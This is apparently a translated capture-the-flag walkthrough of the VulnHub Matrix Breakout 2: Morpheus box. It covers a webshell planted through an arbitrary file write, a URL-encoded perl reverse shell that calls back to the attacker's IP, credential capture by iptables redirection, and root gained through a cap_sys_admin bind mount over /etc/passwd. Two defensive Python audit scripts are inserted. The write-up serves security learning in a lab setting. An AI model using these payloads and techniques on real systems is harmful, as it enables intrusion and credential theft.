VulnHub-matrix-breakout-2-morpheus-Walkthrough
城南花已开

Information Gathering

Service Detection

sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.203 00:0c:29:bd:f4:d1 (Unknown)
192.168.60.254 00:50:56:e3:9f:ef (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.984 seconds (129.03 hosts/sec). 4 responded
export ip=192.168.60.203
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.203:22
Open 192.168.60.203:80
Open 192.168.60.203:81
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-23 20:00 CST
Initiating ARP Ping Scan at 20:00
Scanning 192.168.60.203 [1 port]
Completed ARP Ping Scan at 20:00, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:00
Completed Parallel DNS resolution of 1 host. at 20:00, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:00
Scanning 192.168.60.203 [3 ports]
Discovered open port 81/tcp on 192.168.60.203
Discovered open port 22/tcp on 192.168.60.203
Discovered open port 80/tcp on 192.168.60.203
Completed SYN Stealth Scan at 20:00, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.203
Host is up, received arp-response (0.0020s latency).
Scanned at 2025-02-23 20:00:39 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
81/tcp open hosts2-ns syn-ack ttl 64
MAC Address: 00:0C:29:BD:F4:D1 (VMware)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Open port 80 in the browser.

There is an image and a small hint: Trinity jaybeale inguardians


Brute-force the directories.

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.203
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 348]
/javascript (Status: 301) [Size: 321] [--> http://192.168.60.203/javascript/]
/robots.txt (Status: 200) [Size: 47]
/graffiti.txt (Status: 200) [Size: 139]
/graffiti.php (Status: 200) [Size: 451]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

Fetch each of them.

❯ curl $ip/robots.txt
There's no white rabbit here. Keep searching!
❯ curl http://192.168.60.203/graffiti.txt
Mouse here - welcome to the Nebby!
Make sure not to tell Morpheus about this graffiti wall.
It's just here to let us blow off some steam.

Arbitrary File Write

There is a graffiti wall where anyone can post messages.


It turns out to have a stored XSS.


Capture the request with Burp Suite.

The file name in the request can be chosen freely, so there is an arbitrary file write as the web server user.

Try writing a one-line PHP webshell.


Try executing it.

❯ curl http://192.168.60.204/test.php\?0\=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Next, a reverse shell: nc would not connect back, and after several attempts I found that perl works.

URL-encode the payload and curl it again.

❯ curl http://192.168.60.204/test.php\?0\=perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.60.100%22%3B%24p%3D4444%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fsh%20-i%22%29%3B%7D%3B%27

Alternatively, start an HTTP server on Kali, have the target wget the Pentest Monkey PHP reverse shell, and then request the uploaded shell.php to trigger the callback.


User Privilege Escalation

Start a listener on the port.

There are two users: trinity and cypher.

❯ pwncat-cs -lp 4444
[13:45:24] Welcome to pwncat 🐈! __main__.py:164
bound to 0.0.0.0:4444
[13:46:57] received connection from 192.168.60.204:59124 bind.py:84
[13:46:58] 0.0.0.0:4444: upgrading from /usr/bin/dash to manager.py:957
/usr/bin/bash
[13:47:13] 192.168.60.204:59124: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@morpheus:/var/www/html$ cat /etc/passwd |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
trinity:x:1000:1000::/home/trinity:/bin/bash
cypher:x:1001:1001::/home/cypher:/bin/bash

That is the first flag; according to the hint, we need to work with the .cypher-neo.png image.

(remote) www-data@morpheus:/$ cat FLAG.txt
Flag 1!

You've gotten onto the system. Now why has Cypher locked everyone out of it?

Can you find a way to get Cypher's password? It seems like he gave it to
Agent Smith, so Smith could figure out where to meet him.

Also, pull this image from the webserver on port 80 to get a flag.

/.cypher-neo.png

After downloading it locally, I inspected the image metadata with exiftool.

The image was generated with ImageMagick.

❯ exiftool .cypher-neo.png
ExifTool Version Number : 13.00
File Name : .cypher-neo.png
Directory : .
File Size : 381 kB
File Modification Date/Time : 2025:02:23 23:41:21+08:00
File Access Date/Time : 2025:02:23 23:42:00+08:00
File Inode Change Date/Time : 2025:02:23 23:41:45+08:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 853
Image Height : 480
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Gamma : 2.2
White Point X : 0.3127
White Point Y : 0.329
Red X : 0.64
Red Y : 0.33
Green X : 0.3
Green Y : 0.6
Blue X : 0.15
Blue Y : 0.06
Background Color : 255 255 255
Modify Date : 2021:03:17 10:58:47
Warning : [minor] Text/EXIF chunk(s) found after PNG IDAT (may be ignored by some readers)
Datecreate : 2021-03-17T10:58:47+00:00
Datemodify : 2021-03-17T10:58:47+00:00
Software : https://imagemagick.org
Thumb Document Pages : 1
Thumb Image Height : 480
Thumb Image Width : 853
Thumb Mimetype : image/png
Thumb M Time : 1615978727
Thumb Size : 329716B
Thumb URI : file:///tmp/thumblr/img120644856217080381
Image Size : 853x480
Megapixels : 0.409

ImageMagick can encipher an image with a passphrase, so I tried that angle; nothing came of it.

I also considered LSB steganography; no information there either.

So I changed direction; I suspect the image is just a red herring.

Information Gathering

Checking the IP configuration shows there is also a Docker environment.

(remote) www-data@morpheus:/tmp$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:bd:f4:d1 brd ff:ff:ff:ff:ff:ff
altname enp2s1
inet 192.168.60.204/24 brd 192.168.60.255 scope global dynamic ens33
valid_lft 1725sec preferred_lft 1725sec
inet6 fd15:4ba5:5a2b:1008:20c:29ff:febd:f4d1/64 scope global dynamic mngtmpaddr
valid_lft 86400sec preferred_lft 14400sec
inet6 fe80::20c:29ff:febd:f4d1/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:94:d9:00:66 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:94ff:fed9:66/64 scope link
valid_lft forever preferred_lft forever
5: vethff06aaf@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 22:cb:2a:c9:32:bb brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::20cb:2aff:fec9:32bb/64 scope link
valid_lft forever preferred_lft forever

I uploaded pspy and linpeas.sh and ran them.

(remote) www-data@morpheus:/tmp$ wget 192.168.60.100/linpeas.sh
--2025-02-24 06:26:09-- http://192.168.60.100/linpeas.sh
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827739 (808K) [application/octet-stream]
Saving to: 'linpeas.sh'

linpeas.sh 100%[=======================================================================>] 808.34K --.-KB/s in 0.004s

2025-02-24 06:26:09 (183 MB/s) - 'linpeas.sh' saved [827739/827739]

(remote) www-data@morpheus:/tmp$ wget 192.168.60.100/pspy64
--2025-02-24 06:26:14-- http://192.168.60.100/pspy64
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: 'pspy64'

pspy64 100%[=======================================================================>] 2.96M --.-KB/s in 0.01s

2025-02-24 06:26:14 (251 MB/s) - 'pspy64' saved [3104768/3104768]

(remote) www-data@morpheus:/tmp$ chmod +x linpeas.sh
(remote) www-data@morpheus:/tmp$ chmod +x pspy64

Although this box is fairly old and its kernel is vulnerable to DirtyPipe, please do not use that to escalate privileges; the box was deliberately designed around a different path.

We will follow the intended solution the box author expects; otherwise you miss all the fun of the later privilege escalation.

linpeas shows that python has the cap_sys_admin capability.

Linux Capabilities - HackTricks

Files with capabilities (limited to 50):
/usr/bin/python3-9 cap_sys_admin=ep
/usr/bin/ping cap_net_raw=ep
/usr/sbin/xtables-legacy-multi cap_net_admin=ep
/usr/sbin/xtables-nft-multi cap_net_admin=ep

However, it cannot be executed as the current www-data user.

Members of the humans group can execute it, though.

(remote) www-data@morpheus:/tmp$ ls -al /usr/bin/python3-9
-rwxr-x--- 1 root humans 5479736 Oct 28 2021 /usr/bin/python3-9
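The dangerous combination here is a privilege-crossing file capability on a binary that a non-root group can run. As an added example (not part of the walkthrough), here is a small Python audit that parses getcap and ls -l output and flags exactly that condition; the sample input is constructed from the page's own lines, except the ping permission line, which is made up.

```python
DANGEROUS = {  # file capabilities that let the holder cross privilege boundaries
    "cap_sys_admin", "cap_dac_override", "cap_dac_read_search", "cap_chown",
    "cap_fowner", "cap_setuid", "cap_setgid", "cap_sys_ptrace", "cap_sys_module",
}

# Constructed from the walkthrough's linpeas output.
GETCAP_OUTPUT = """\
/usr/bin/python3-9 cap_sys_admin=ep
/usr/bin/ping cap_net_raw=ep
/usr/sbin/xtables-legacy-multi cap_net_admin=ep
"""

# The python3-9 line is from the page; the ping line is a constructed example.
LS_OUTPUT = """\
-rwxr-x--- 1 root humans 5479736 Oct 28 2021 /usr/bin/python3-9
-rwxr-xr-x 1 root root 76744 Oct 28 2021 /usr/bin/ping
"""

def parse_getcap(text):
    """Map path -> (set of capability names, flag letters) from getcap -r output."""
    caps = {}
    for line in text.splitlines():
        path, _, spec = line.strip().partition(" ")
        names, _, flags = spec.partition("=")
        if path and names:
            caps[path] = (set(names.split(",")), flags)
    return caps

def parse_ls(text):
    """Map path -> (mode string, owner, group) from ls -l output."""
    files = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 9:
            files[fields[-1]] = (fields[0], fields[2], fields[3])
    return files

def who_can_execute(mode):
    """Permission classes with an execute bit set, e.g. '-rwxr-x---' -> owner, group."""
    return [cls for cls, i in (("owner", 3), ("group", 6), ("other", 9)) if mode[i] in "xst"]

def audit(getcap_text, ls_text):
    """Report dangerous file capabilities on binaries that a non-root principal can run."""
    files = parse_ls(ls_text)
    findings = []
    for path, (names, flags) in parse_getcap(getcap_text).items():
        risky = names & DANGEROUS
        if not risky:
            continue
        mode, owner, group = files.get(path, ("?" * 10, "?", "?"))
        # root running its own binary gains nothing; anyone else reaching it is the finding
        reach = [c for c in who_can_execute(mode) if not (c == "owner" and owner == "root")]
        if reach:
            findings.append({"path": path, "capabilities": sorted(risky), "flags": flags,
                             "owner": owner, "group": group, "executable_by": reach})
    return findings
```

On a live host, feed it the output of `getcap -r / 2>/dev/null` and `ls -l` of the paths it reports.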

Meanwhile, port 81 is protected by a Basic Authorization login.


Look at the nginx configuration.

The hash in auth_basic_user_file was generated by Apache's htpasswd ($apr1$ format).

drwxr-xr-x 2 root root 4096 Oct 28  2021 /etc/nginx/sites-enabled
lrwxrwxrwx 1 root root 34 Oct 28 2021 /etc/nginx/sites-enabled/default -> /etc/nginx/sites-available/default
server {
listen 81 default_server;
listen [::]:81 default_server;
root /var/nginx/html;
auth_basic "Meeting Place";
auth_basic_user_file /var/nginx/html/.htpasswd;
index index.html index.htm index.nginx-debian.html;
server_name _;
location / {
try_files $uri $uri/ =404;
}
}
---------------------------
-rw-r--r-- 1 nginx nginx 45 Oct 28 2021 /var/nginx/html/.htpasswd
cypher:$apr1$e9o8Y7Om$5zgDW6WOO6Fl8rCC7jpvX0


The index.html served on port 81 contains a hint.

(remote) www-data@morpheus:/var/nginx/html$ cat index.html
<html><head><title>Meeting Place</title></head><body>

<p>
<center>
<h2>Dinner to Discuss Zion</h2>
</center>
</p>
<p>
Agent Smith, if you want to break into Zion, meet me in 3 days at the steak house at the corner of Wabash and Lake.
<img src="ignorance-bliss.png" >
</p>
<p>
"I know this steak doesn't exist. I know that when I put it in my mouth, the Matrix is telling my brain that it is juicy and delicious. After nine years, you know what I realize? Ignorance is bliss."
</p>
</body>
</html>

Look at the image referenced in the source.


It does not appear to hide anything via steganography.

Use pspy64 to monitor system processes.

You will notice a process that periodically sends requests to port 81.

2025/02/24 07:39:01 CMD: UID=0 PID=17122 | /usr/sbin/CRON -f
2025/02/24 07:39:01 CMD: UID=0 PID=17123 | /bin/sh -c chown -R root /crew
2025/02/24 07:39:24 CMD: UID=0 PID=17129 | sleep 60
2025/02/24 07:39:39 CMD: UID=0 PID=17130 | (ionclean)
2025/02/24 07:39:39 CMD: UID=0 PID=17134 | /usr/bin/basic-auth-client

But if you look for this program, it does not exist on the host.

Presumably it lives in the Docker container.

(remote) www-data@morpheus:/tmp$ ls -al /usr/bin/basic-auth-client
ls: cannot access '/usr/bin/basic-auth-client': No such file or directory
(remote) www-data@morpheus:/tmp$ ping 172.17.0.2
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.046 ms
64 bytes from 172.17.0.2: icmp_seq=2 ttl=64 time=0.030 ms
^C
--- 172.17.0.2 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1007ms
rtt min/avg/max/mdev = 0.030/0.038/0.046/0.008 ms

The program inside the container periodically connects to port 81 on the host (172.17.0.1), simulating a user logging in.

iptables Port Forwarding

So we can use iptables to redirect the requests arriving at port 81 to a port we open ourselves.

(remote) www-data@morpheus:/tmp$ iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy DROP)
target prot opt source destination
DOCKER-USER all -- anywhere anywhere
DOCKER-ISOLATION-STAGE-1 all -- anywhere anywhere
ACCEPT all -- anywhere anywhere ctstate RELATED,ESTABLISHED
DOCKER all -- anywhere anywhere
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

Chain DOCKER (1 references)
target prot opt source destination

Chain DOCKER-ISOLATION-STAGE-1 (1 references)
target prot opt source destination
DOCKER-ISOLATION-STAGE-2 all -- anywhere anywhere
RETURN all -- anywhere anywhere

Chain DOCKER-ISOLATION-STAGE-2 (1 references)
target prot opt source destination
DROP all -- anywhere anywhere
RETURN all -- anywhere anywhere

Chain DOCKER-USER (1 references)
target prot opt source destination
RETURN all -- anywhere anywhere

Listening on port 8181 yields the credential cypher:cache-prosy-proceeds-clue-expiate-ammo-pugilist

That is quite a long password.

(remote) www-data@morpheus:/tmp$ iptables -A FORWARD -p tcp -d 172.17.0.1 --dport 81 -j ACCEPT
(remote) www-data@morpheus:/tmp$ iptables -A PREROUTING -t nat -i docker0 -p tcp --dport 81 -j DNAT --to 172.17.0.1:8181
(remote) www-data@morpheus:/tmp$ nc -lvp 8181
Listening on 0.0.0.0 8181
Connection received on 172.17.0.2 57934
GET / HTTP/1.1
Host: 172.17.0.1:81
User-Agent: Go-http-client/1.1
Authorization: Basic Y3lwaGVyOmNhY2hlLXByb3N5LXByb2NlZWRzLWNsdWUtZXhwaWF0ZS1hbW1vLXB1Z2lsaXN0
Accept-Encoding: gzip

(remote) www-data@morpheus:/tmp$ echo "Y3lwaGVyOmNhY2hlLXByb3N5LXByb2NlZWRzLWNsdWUtZXhwaWF0ZS1hbW1vLXB1Z2lsaXN0"|base64 -d
cypher:cache-prosy-proceeds-clue-expiate-ammo-pugilist
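The credential falls out of a single captured request because HTTP Basic auth only base64-encodes it, and the client sends it over plain HTTP on port 81. As an added example (not part of the walkthrough), here is a small Python checker that parses a captured request like the one above and reports Basic credentials sent without TLS while keeping the password out of the report; the sample request is constructed from the page's capture.

```python
import base64
import binascii

# Constructed sample: the request the walkthrough captured on the redirected
# port (the Authorization value is the one shown on the page).
CAPTURED_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: 172.17.0.1:81\r\n"
    "User-Agent: Go-http-client/1.1\r\n"
    "Authorization: Basic Y3lwaGVyOmNhY2hlLXByb3N5LXByb2NlZWRzLWNsdWUtZXhwaWF0ZS1hbW1vLXB1Z2lsaXN0\r\n"
    "Accept-Encoding: gzip\r\n"
    "\r\n"
)

def parse_request(raw):
    """Split a raw HTTP request into its request line and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def basic_auth_credentials(headers):
    """Return (user, password) if the request carries well-formed Basic auth, else None."""
    scheme, _, token = headers.get("authorization", "").partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = decoded.partition(":")
    return (user, password) if sep else None

def audit_request(raw, over_tls=False):
    """Flag Basic credentials on a cleartext connection; the password itself is never reported."""
    request_line, headers = parse_request(raw)
    creds = basic_auth_credentials(headers)
    if creds is None:
        return None
    user, password = creds
    return {"request": request_line, "host": headers.get("host"), "user": user,
            "password_length": len(password), "cleartext": not over_tls}

if __name__ == "__main__":
    print(audit_request(CAPTURED_REQUEST))
```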

iptables: the command itself, used to manage Linux IP packet-filtering rules.

-A FORWARD: append (-A) a new rule to the FORWARD chain, which handles packets being forwarded through the host.

-A PREROUTING: append (-A) a new rule to the PREROUTING chain, which processes packets as they enter the firewall, before routing.

-t nat: select the nat (network address translation) table.

-i docker0: match the input interface docker0 (the bridge interface created by Docker).

-p tcp: match the TCP protocol.

--dport 81: match destination port 81.

-j DNAT: jump to the DNAT (destination address translation) target.

-j ACCEPT: accept the packet if it matches all the preceding conditions.

--to 172.17.0.1:8181: rewrite the destination address to 172.17.0.1 and the destination port to 8181.

Root Privilege Escalation

Log in over SSH with this credential.

cypher happens to be a member of the humans group as well.

❯ ssh cypher@192.168.60.204
The authenticity of host '192.168.60.204 (192.168.60.204)' can't be established.
ECDSA key fingerprint is SHA256:5lN4/ZmxBo1d2GfJ+D5fzrFNSvzczVZd+OkTv8uIggU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.204' (ECDSA) to the list of known hosts.
cypher@192.168.60.204's password:
Linux morpheus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Oct 28 06:54:49 2021 from 10.23.58.30
cypher@morpheus:~$ cat FLAG.txt
You've clearly gained access as user Cypher.

Can you find a way to get to root?

cypher@morpheus:~$ id
uid=1001(cypher) gid=1001(cypher) groups=1001(cypher),1002(humans)

Escalate using cap_sys_admin.

In the copied passwd, delete the x in root's password field, then run the Python commands below to bind-mount the copy over /etc/passwd.

cypher@morpheus:~$ cp /etc/passwd .
cypher@morpheus:~$ vi passwd
cypher@morpheus:~$ /usr/bin/python3-9
Python 3.9.2 (default, Feb 28 2021, 17:03:44)
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from ctypes import *
>>> libc = CDLL("libc.so.6")
>>> libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
>>> MS_BIND = 4096
SyntaxError: EOL while scanning string literal
>>> source = b"/home/cypher/passwd"
>>> target = b"/etc/passwd"
>>> filesystemtype = b"none"
>>> options = b"rw"
>>> mountflags = MS_BIND
>>> libc.mount(source, target, filesystemtype, mountflags, options)
>>> exit()
cypher@morpheus:~$ su root
root@morpheus:/home/cypher# cd /root/
root@morpheus:~# ls
FLAG.txt
root@morpheus:~# cat FLAG.txt
You've won!

Let's hope Matrix: Resurrections rocks!

If you skip the kernel exploit, the later steps are still quite challenging.

Going further, you can look at how the simulated login is implemented.

It turns out to be a custom-built executable; I am not much good at reversing, so I did not dig into it.

root@morpheus:/home/cypher# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
c08573ce98d3 infinite-request "/main.sh" 3 years ago Up 10 hours infinite-request
root@morpheus:/home/cypher# docker exec -it c085 /bin/bash
root@c08573ce98d3:/# cat main.sh
#!/bin/bash

while :
do
/usr/bin/basic-auth-client
sleep 60

done
